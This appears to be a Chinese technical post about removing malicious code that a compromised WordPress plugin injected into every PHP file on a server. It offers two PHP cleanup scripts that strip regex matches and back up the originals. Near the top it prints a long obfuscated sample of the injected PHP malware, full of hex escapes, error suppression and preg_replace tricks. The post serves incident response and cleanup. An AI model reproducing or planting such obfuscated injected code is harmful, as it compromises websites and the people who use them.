公司的一些 WordPress 网站下载了带有恶意代码的插件,导致整台服务器上所有网站的 PHP 文件都被植入了恶意代码,于是写了个简单的脚本来清除。注意:脚本只能清除已被植入的代码,带有恶意代码的插件本身仍需卸载,否则文件可能再次被感染。
恶意代码示例
!#]y3d]51]y35]256]y76]72]y3d]51]y35]274]y4:]82]y3:]621:|:*mmvo:>:iuhofm%x5c%x7825:-5ppde:4:|:**#ppde#)tutjyf%7825yy>#]d6]281l1#%x5c%x782f#m5]dgp5]d6#!#]y81]273]y>#]d4]273]d6p2l5p6]y6gp7l6m7]d4]275]d:m8]df#^#zsfvrx5c%x7827&6hmg%x5c%x7825!j%%x5c%x7825:|:**t%x5c%xw~!%x5c%x7825z!>215b:%x5c%x7825s:%x5cw>#]y74]273]y76]252]y85]256]y6g]257]y8!:8:|:7#6ufs!|ftmf!~!#]y81]273]y76]258]y6g]273]#*%x5c%x7824-%x5c%x7824!>!tus%x5x782fq%x5c%x7825>2q%x5c%x7825%x5c%x782f7rfs%x5c%x78256!%x5c%x7824c%x7825c!>!%x5c%x7825i%x5c%x785c2^n%x5c%x7825!bssbz)%x5c%x7824]25%x5c%x7824-%x5c%x7824-!%x5c%x7825%x5c%x7824-%7825)m%x5c%x7825=*h%x5c%x78254%x5c%x785c%x5c%x7825j^%x527,*e%x5c%x7827,*d%x5c%x7827,*cmfv%x5c%x787fu%x5c%x!*5!%x5c%x7827!hmg%x5c%x7825)!gj!|!*1?hmg%x5c%x7or_reporting(0); preg_replace(%x2f%ggg)(0)%x5c%x782f+*0f(-!#]y76]277]y72]265]y76]258]y6g]273]y76]271]y7d]25%x5c%x7825hoh%x5c%x782f#00#w~!%x5c%xs[%x61%156%x75%156%x61]=1; function f:h%x5c%x7825:!2p%x5c2fh%x5c%x7825:%x5c%x7825fdyum%x5c%x5c%x7825!qp%x5c%x7825!|z~!!2p%x5c%x7825!|!*!***b%x5#p#-#q#-#b#-#t#-#e#-#g#-#x787fw6*%x5c%x787f_*#fmjgk4%x5*wcw*[!%x5c%x7825rn}#qwtw%xc%x7825%x5c%x7824-%x5c%x7824b!>!%x5c%x7825yy)#}#50%x2e%52%x29%57%x65,%x65%166%x61%154%x28%151%x6d%160%x6c%25)+opjudovg+)!gj+{e%x5c%x7825!osvufs!*!+a!>!{e%x5c%7827pd%x5c%x78256b%x5c%x7825!*##>>x)!gjzb%x5c%x7825!**x)ufttj%x7825c:>11%x5c%x782272qj%x5c%x7825)7gj6!}_;gvc%x5c%x7825}&;ftmbg}%x5c%x787f;!osvufs}w;*%x5c%x787f!>x7825!>}r;msv}.;%x5c%x782f#%xc%x78b%x5c%x7825w:!>!%x5c%x78246767~6>%x5c%|!*bube{h%x5c%x7825)j{hnpd!opjudovg!|!**#j{hnpd#)tujqetqcoc%x5c%x782f#00#w~!ydrr)%x5c%x7825r%x5c%x78!2p%x5c%x78uft%x5c%x7860msvd},;uqpuft%x5c%x7860msvd}+;!>!}%x5c%x7827;!>>6|7**111127-k)ebfsx%x5c%x7827u%x5c%x7825)7fmji%x5c%x7860ufldpt}x;%x5c%x78#%x5c%x785cq%x5c%x78257**^#zsfvr#%x5c%x785cq%x5c%x7825)uftc%x7825tpz!>!#]d6m7]k3#}>!%x5c%x7825tdz)%x5c%x7825ofmy%x5c%x7825,3,j%x5c%x7825>j%x5c%x782560msvd}r;*msv%x5c%x7825)}.;%x5c%x7860uqp78w~!ypp2)%x5c%x7825zb%x5c%x7825z>!tussfw)%x5c%x7825zw%x55c%x787
fw6>%x5c%x7822!ftmbg)!gj]58y]472]37y]672]48y]#>s%x5c%x7825q5c%x7825)!gj!2bd%x5c%x7825!2qj%x5c%x78257-k)udfoopdxa%x54!#]y76]277]y72]265]y39]274]y85]273]y661?*2b%x5c%x7825)gpf{jt)!gj!:r7e:55946-tr.984:75983:48984:71]k9]77]d4]82]k6]72]k9]78]k5]53]kc#>2*!%x5c%x7825z>3j%x5c%x7825!*72!%x5c%x7827!hmg%x-t.98]k4]65]d8]86]y31]278]y3f]5c%x7860sfqmbdf)%x5c%x7825%x5c%x7824-%x5c%x7%x5c%x7822)gj!|!*nbsbq%x5c%x7825)323ldfidk!~!!#]y84]275]y83]248]y83]256c%x7825v%x5c%x7827{ftmfv%x5c%x787f%x5c%x782f7&%x7825:|:*r%x5c%x7825:-t%x5c%x7825)3of:opjud7825!-uyfu%x5c%x7825)3of)fepdof%x5c%x786057ftbc%x5c%x787f!|!*uyfu%x5c%x5c%x7825)hopm3qja)qj3hopma%x578bsfuvso!sboepn)%x5c%x7825epnbss-%x5c%x7825r%x5c%x78782fqp%x5c%x7825>5h%x5c%4-%x5c%x7824y7%x5c%x7824-%>!}w;utpi}y;tuofuopd%x5c%x7tsbqa7>q%x5c%x78256%x5c%x7897e:56-%x5c%x7878r.985:52985c%x7825kj:-!ovmm*#l4]275l3]248l3p6l1m5]d2p4]d6#>1*!%x5c%x7825b:]y4c#!%x5c%x7824ypp3)%x5c%x7825cb%x5c%e56+99386c6f+9f5d816:+946:ce44#)zbssb!>!ssbnpe_gmft%x5c%x7860qiq&f_utbek!~!bjepdof.uofuopd#)sfebfi{*w%x5c%x7825)kv%x5c%x7878{**#cvt-#w#)ldbqov>*ofmy%x5c%x7825)utjm!|%x5c%x7824-%x5c%x7824!>!fyqmpef)#%x5c%x7824*q%x5c%x7825v>*4-1-bube{h%x5c%x7825)sutcvt)!gj!5)sf%x5c%x7878pmpusut)tpqssutre%x5c%x7825)rd%x5c%x7%x7825c*w%x5c%x7825en+#qi%x5c%x785c1^w%x5c%x7825)tpqsut>j%x5c%x7825!*9!%x5c%x7827!hmg%x5c%x7825)!gj!~#]y31]278]y3e]81]k78:569x7827k:!ftmf!}z;^nbsbq%x5c%x7825%x5c%x785csfwtj%x5c%x7822)gj6!%x5c%x782400~:ew:qb:qc:]37]278]225]241]334]368]322]3]364]6]283]2178}527}88:}334}472%x55c%x7825hir%x5c%x785c1^-%x5c%x7825r%x5c%x785c2^-5c%x782f#%x5c%x782f},;#-#}+;%x5c%x7825-qp%x5c%x7825)5c%x782f*#npd%x5c%x782f#)rrd%x5c%x782f#00;quui#>.5j:>11%x5c%x7825s:%x5c%x785c%x5c%x7825j:.2^,%x5c%x782x5c%x782f#o]#%x5c%x782f*)323zbe!-#jt0*?]+^?]_%x5c%x785c}x%x5c%x782{66~6j%x5c%x7825!*3!%x5c%x7827c%x78256!#]y84]275]y83]273]y76]277#2b%x5c%7825%x5c%x7827y%x5c%x78256ezh,2w%x5c%x7825wn;#-ez-1h9%164%50%x22%134%x78%62%x35%165%x3a%146%x21%76%x5fdy)##-!#~2%x5c%x7822!pd%x5c%x7825)!gj}z;h!opjudovg}{;#)tutjyf%
x5c%21%50%x5c%x7825%x5c%x7878:!>#]y3g]61]y3f]63]y3:]68]y76#
恶意代码清理程序
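<?php
/*
 * Injected-code cleanup, list-then-clean variant.
 *
 * Collects every file under $path whose extension is listed in $filetype,
 * removes whatever the $search pattern matches, and keeps a copy of each
 * modified file under $bak_path with the same relative layout.
 *
 * NOTE(review): the opening of this listing was lost on the page. Before
 * this point the script must define:
 *   $path     - directory tree to scan
 *   $bak_path - directory that receives the untouched originals
 *   $filetype - array of file extensions to examine
 *   $search   - PCRE pattern matching the injected code
 * Their original values are not shown on the page, so none are filled in here.
 *
 * The backups are the still-infected originals: keep $bak_path outside any
 * web-served directory so they cannot be requested and executed. Removing
 * the injected block does not remove the plugin that wrote it; that has to
 * be dealt with separately.
 */

$search_count = array(
    'all_file'     => array(), // every file examined
    'search_file0' => array(), // files left unchanged
    'search_file1' => array(), // files the pattern matched and that were cleaned
);
$failed = array(); // files that could not be processed safely and were left untouched

// Normalise both roots the same way listdir() normalises the names it returns,
// otherwise the prefix swap that builds the backup path would not line up.
$scan_root = normalize_dir($path);
$bak_root  = normalize_dir($bak_path);

$filelist = listdir($path, $filetype, false); // plain path strings, no per-file metadata
if (!empty($filelist)) {
    foreach ($filelist as $file) {
        $file = is_array($file) ? $file['name'] : $file;
        $search_count['all_file'][] = $file;

        // Never rewrite the backup copies themselves.
        if ($bak_root !== '' && strpos($file, $bak_root) !== false) {
            $search_count['search_file0'][] = $file;
            continue;
        }

        $filecontent = @file_get_contents($file);
        if ($filecontent === false) {
            $failed[] = $file;
            continue;
        }

        // preg_replace() returns null on a PCRE error (for example a backtrack
        // limit hit on a very long obfuscated line). Writing that result back
        // would truncate the file to zero bytes, so treat it as a failure.
        $compile_filecontent = preg_replace($search, '', $filecontent);
        if ($compile_filecontent === null) {
            $failed[] = $file;
            continue;
        }

        if ($compile_filecontent === $filecontent) {
            $search_count['search_file0'][] = $file;
            continue;
        }

        // The original is only overwritten once its backup is known to be complete.
        if (!backup_original($file, $scan_root, $bak_root, $filecontent)) {
            $failed[] = $file;
            continue;
        }
        if (@file_put_contents($file, $compile_filecontent) === false) {
            $failed[] = $file;
            continue;
        }
        $search_count['search_file1'][] = $file;
    }
}

echo sprintf('从%s里共搜索到%s个符合条件的文件,其中%s个存在恶意代码,已处理结束',$path,count($search_count['all_file']), count($search_count['search_file1']));
if (!empty($failed)) {
    echo sprintf(';另有%s个文件处理失败,未作改动', count($failed));
}
die;

########################## Helper functions ########################

/**
 * Convert both slash styles to the platform separator and drop one trailing separator.
 *
 * @param string $dir directory path
 *
 * @return string
 */
function normalize_dir($dir)
{
    $dir = str_replace(array('/', '\\'), DIRECTORY_SEPARATOR, (string) $dir);
    if (substr($dir, -1, 1) == DIRECTORY_SEPARATOR) {
        $dir = substr($dir, 0, -1);
    }
    return $dir;
}

/**
 * Store the unmodified content of $file under $bak_root, mirroring its path below $scan_root.
 *
 * @param string $file      path as returned by listdir()
 * @param string $scan_root normalised scan root
 * @param string $bak_root  normalised backup root
 * @param string $content   original file content
 *
 * @return bool true only when the whole content was written to the backup
 */
function backup_original($file, $scan_root, $bak_root, $content)
{
    $prefix = $scan_root . DIRECTORY_SEPARATOR;
    // Without a usable backup root, or for a path outside the scan root, the
    // computed target could be the file itself; refuse instead of guessing.
    if ($bak_root === '' || strncmp($file, $prefix, strlen($prefix)) !== 0) {
        return false;
    }
    $bakfile = $bak_root . substr($file, strlen($scan_root));
    if (!make_dir(dirname($bakfile))) {
        return false;
    }
    // Comparing the byte count also catches a partial write (e.g. a full disk).
    return @file_put_contents($bakfile, $content) === strlen($content);
}

/**
 * Make sure the target directory exists, creating it (and any missing parents) if needed.
 *
 * @access public
 * @param string $folder directory path; a filesystem path, not a URL relative to the site root
 *
 * @return bool true when $folder is a directory after the call
 */
function make_dir($folder)
{
    if (!file_exists($folder)) {
        // 0700 rather than umask(0) + 0777: these directories hold copies of the
        // infected files and should not be writable or listable by other accounts.
        // Loosen this deliberately if another account has to collect the backups.
        @mkdir($folder, 0700, true);
    }
    clearstatcache();
    return is_dir($folder);
}

/**
 * List everything below $path, recursing into subdirectories.
 *
 * With an empty $filetype only directories are listed; otherwise only files
 * whose extension is in $filetype.
 *
 * NOTE(review): is_dir() follows symbolic links, so a linked directory is
 * traversed as well, including one that points outside $path.
 *
 * @param string $path     directory to walk
 * @param array  $filetype file extensions to include
 * @param bool   $fileinfo true: one metadata array per entry; false: the path string only
 *
 * @return array empty when $path is not a readable directory
 */
function listdir($path, $filetype = array(), $fileinfo = true)
{
    $path = normalize_dir($path);
    if (!is_dir($path)) {
        return array();
    }
    $dir = @opendir($path);
    if ($dir === false) {
        return array();
    }

    $dirlist = array();
    // Compare against false explicitly: an entry named "0" is falsy and would end the loop early.
    while (false !== ($file = readdir($dir))) {
        if ($file === '.' || $file === '..') {
            continue;
        }
        $file = $path . DIRECTORY_SEPARATOR . $file;
        if (is_dir($file)) {
            if (empty($filetype)) {
                $dirlist[] = $fileinfo ? array('name' => $file, 'isdir' => 1) : $file;
            }
            // Pass $fileinfo down so nested entries have the same shape as top-level ones
            // and no hashes are computed when the caller did not ask for them.
            $dirlist = array_merge($dirlist, listdir($file, $filetype, $fileinfo));
        } elseif (!empty($filetype) && in_array(pathinfo($file, PATHINFO_EXTENSION), $filetype, true)) {
            $dirlist[] = $fileinfo
                ? array(
                    'name'      => $file,
                    'isdir'     => 0,
                    'md5_file'  => md5_file($file),
                    'filesize'  => filesize($file),
                    'filemtime' => filemtime($file),
                )
                : $file;
        }
    }
    closedir($dir);
    return $dirlist;
}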
删除ftp里恶意代码(支持任意数量的文件处理)
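<?php
/*
 * Injected-code cleanup, clean-while-walking variant.
 *
 * Walks the tree under $path and cleans each matching file as it is found,
 * so no list of all files is built first. Every modified file is first
 * copied under $bak_path with the same relative layout.
 *
 * NOTE(review): the opening of this listing was lost on the page. Before
 * this point the script must define:
 *   $path     - directory tree to scan
 *   $bak_path - directory that receives the untouched originals
 *   $filetype - array of file extensions to examine
 *   $search   - PCRE pattern matching the injected code
 * Their original values are not shown on the page, so none are filled in here.
 *
 * The backups are the still-infected originals: keep $bak_path outside any
 * web-served directory so they cannot be requested and executed.
 */

$file_count = array(
    'all_file'    => 0, // files examined
    'filter_file' => 0, // files the pattern matched and that were cleaned
    'failed_file' => 0, // files that could not be processed safely and were left untouched
);

replaceunwantedcode($path); // run the cleanup

echo sprintf('从%s里共搜索到%s个符合条件的文件,其中%s个存在恶意代码已清理,原始文件保存在%s',$path, ($file_count['all_file']), ($file_count['filter_file']), $bak_path);
if ($file_count['failed_file'] > 0) {
    echo sprintf(';另有%s个文件处理失败,未作改动', $file_count['failed_file']);
}
die;

/**
 * Recursively clean every matching file below $path.
 *
 * Reads $bak_path, $filetype and $search from the global scope and updates
 * the global $file_count counters.
 *
 * @param string      $path directory to process
 * @param string|null $root scan root used to mirror paths into the backup tree;
 *                          leave unset on the initial call, recursion fills it in
 *
 * @return bool|string true on success, '' when $path is not a readable directory
 */
function replaceunwantedcode($path, $root = null)
{
    global $bak_path, $filetype, $search, $file_count;

    $path = normalize_dir($path);
    if ($root === null) {
        // Backup paths must be computed against the top of the scan, not the
        // directory currently being walked; otherwise every backup lands flat
        // in $bak_path and same-named files overwrite each other.
        $root = $path;
    }
    if (!is_dir($path)) {
        return '';
    }
    $dir = @opendir($path);
    if ($dir === false) {
        return '';
    }
    $bak_root = normalize_dir($bak_path);

    // Compare against false explicitly: an entry named "0" is falsy and would end the loop early.
    while (false !== ($file = readdir($dir))) {
        if ($file === '.' || $file === '..') {
            continue;
        }
        $file = $path . DIRECTORY_SEPARATOR . $file;

        // NOTE(review): is_dir() follows symbolic links, so a linked directory
        // is processed as well, including one that points outside the scan root.
        if (is_dir($file)) {
            replaceunwantedcode($file, $root);
            continue;
        }
        if (empty($filetype) || !in_array(pathinfo($file, PATHINFO_EXTENSION), $filetype, true)) {
            continue;
        }

        $file_count['all_file']++;

        // Never rewrite the backup copies themselves.
        if ($bak_root !== '' && strpos($file, $bak_root) !== false) {
            continue;
        }

        $filecontent = @file_get_contents($file); // original content
        if ($filecontent === false) {
            $file_count['failed_file']++;
            continue;
        }

        // preg_replace() returns null on a PCRE error (for example a backtrack
        // limit hit on a very long obfuscated line). Writing that result back
        // would truncate the file to zero bytes, so treat it as a failure.
        $compile_filecontent = preg_replace($search, '', $filecontent); // content after filtering
        if ($compile_filecontent === null) {
            $file_count['failed_file']++;
            continue;
        }
        if ($compile_filecontent === $filecontent) {
            continue;
        }

        // The original is only overwritten once its backup is known to be complete.
        if (!backup_original($file, $root, $bak_root, $filecontent)
            || @file_put_contents($file, $compile_filecontent) === false) {
            $file_count['failed_file']++;
            continue;
        }
        $file_count['filter_file']++;

        unset($filecontent, $compile_filecontent);
    }
    closedir($dir);
    return true;
}

########################## Helper functions ########################

/**
 * Convert both slash styles to the platform separator and drop one trailing separator.
 *
 * @param string $dir directory path
 *
 * @return string
 */
function normalize_dir($dir)
{
    $dir = str_replace(array('/', '\\'), DIRECTORY_SEPARATOR, (string) $dir);
    if (substr($dir, -1, 1) == DIRECTORY_SEPARATOR) {
        $dir = substr($dir, 0, -1);
    }
    return $dir;
}

/**
 * Store the unmodified content of $file under $bak_root, mirroring its path below $scan_root.
 *
 * @param string $file      full path of the file being cleaned
 * @param string $scan_root normalised scan root
 * @param string $bak_root  normalised backup root
 * @param string $content   original file content
 *
 * @return bool true only when the whole content was written to the backup
 */
function backup_original($file, $scan_root, $bak_root, $content)
{
    $prefix = $scan_root . DIRECTORY_SEPARATOR;
    // Without a usable backup root, or for a path outside the scan root, the
    // computed target could be the file itself; refuse instead of guessing.
    if ($bak_root === '' || strncmp($file, $prefix, strlen($prefix)) !== 0) {
        return false;
    }
    $bakfile = $bak_root . substr($file, strlen($scan_root));
    if (!make_dir(dirname($bakfile))) {
        return false;
    }
    // Comparing the byte count also catches a partial write (e.g. a full disk).
    return @file_put_contents($bakfile, $content) === strlen($content);
}

/**
 * Make sure the target directory exists, creating it (and any missing parents) if needed.
 *
 * @access public
 * @param string $folder directory path; a filesystem path, not a URL relative to the site root
 *
 * @return bool true when $folder is a directory after the call
 */
function make_dir($folder)
{
    if (!file_exists($folder)) {
        // 0700 rather than umask(0) + 0777: these directories hold copies of the
        // infected files and should not be writable or listable by other accounts.
        // Loosen this deliberately if another account has to collect the backups.
        @mkdir($folder, 0700, true);
    }
    clearstatcache();
    return is_dir($folder);
}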